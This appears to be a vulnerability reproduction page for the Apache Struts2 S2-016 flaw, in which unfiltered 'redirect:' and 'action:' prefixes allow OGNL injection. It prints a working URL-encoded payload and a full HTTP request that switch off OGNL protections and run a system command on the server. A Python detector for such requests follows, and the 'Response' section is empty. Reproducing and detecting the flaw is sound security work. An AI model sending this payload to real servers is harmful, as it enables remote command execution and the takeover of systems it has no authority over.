Struts2 S2-016

Reference: https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md

The DefaultActionMapper class supports the prefixes "action:", "redirect:" and "redirectAction:" for navigation or redirection, but the text following these prefixes may itself be an OGNL expression. Because Struts2 does not filter or validate what follows these prefixes, an attacker-supplied OGNL expression can call Java static methods and execute arbitrary system commands.

Payload

Executes the system command: ls /usr

redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%20/usr%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D

Request

GET /index.action?redirect:%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22ls%20/usr%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: xxx.xxxx.xxx.xxx:8080
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 MicroMessenger/7.0.9.501 NetType/WIFI MiniProgramEnv/Windows WindowsWechat
content-type: application/json;charset=utf-8
Accept-Encoding: gzip, deflate
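Because the three prefixes are only dangerous when an OGNL expression follows them, a defender can flag S2-016 attempts by URL-decoding each query parameter and checking for a prefix followed by OGNL markers. The following detector is an added example, not code from the vulhub page or from Struts; the request line it inspects is the one shown above, and the two benign lines are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Prefixes interpreted by DefaultActionMapper that S2-016 abuses.
S2016_PREFIXES = ("action:", "redirect:", "redirectAction:")

# OGNL expression markers, matched only after URL-decoding.
OGNL_MARKER = re.compile(r"[$%]\{|#_memberAccess|@java\.lang\.Runtime@")

# Request line taken from the reproduction above (page's own sample).
PAGE_REQUEST_LINE = (
    "GET /index.action?redirect:%24%7B%23context%5B%22xwork.MethodAccessor."
    "denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass()."
    "getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)"
    "%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40"
    "getRuntime().exec(%22ls%20/usr%22).getInputStream()%2C%23b%3Dnew%20java.io."
    "InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3D"
    "new%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com."
    "opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor"
    ".println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1"
)

# Constructed benign requests: a plain redirect and an ordinary parameter.
BENIGN_REDIRECT = "GET /index.action?redirect:/home.jsp HTTP/1.1"
BENIGN_PARAM = "GET /index.action?name=bob&page=2 HTTP/1.1"


def check_request_line(request_line: str) -> list:
    """Return (prefix, decoded_parameter) for every S2-016-style parameter.

    The payload lives in the parameter *name* (there is no '=' at all), so the
    whole decoded parameter is inspected rather than a name/value split.
    """
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    for raw_param in query.split("&"):
        decoded = unquote_plus(raw_param)
        for prefix in S2016_PREFIXES:
            if decoded.startswith(prefix) and OGNL_MARKER.search(decoded[len(prefix):]):
                findings.append((prefix, decoded))
    return findings
```

Run the same check over access-log request lines to find past attempts; the decoded parameter in each finding shows which OGNL calls were used.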

Response
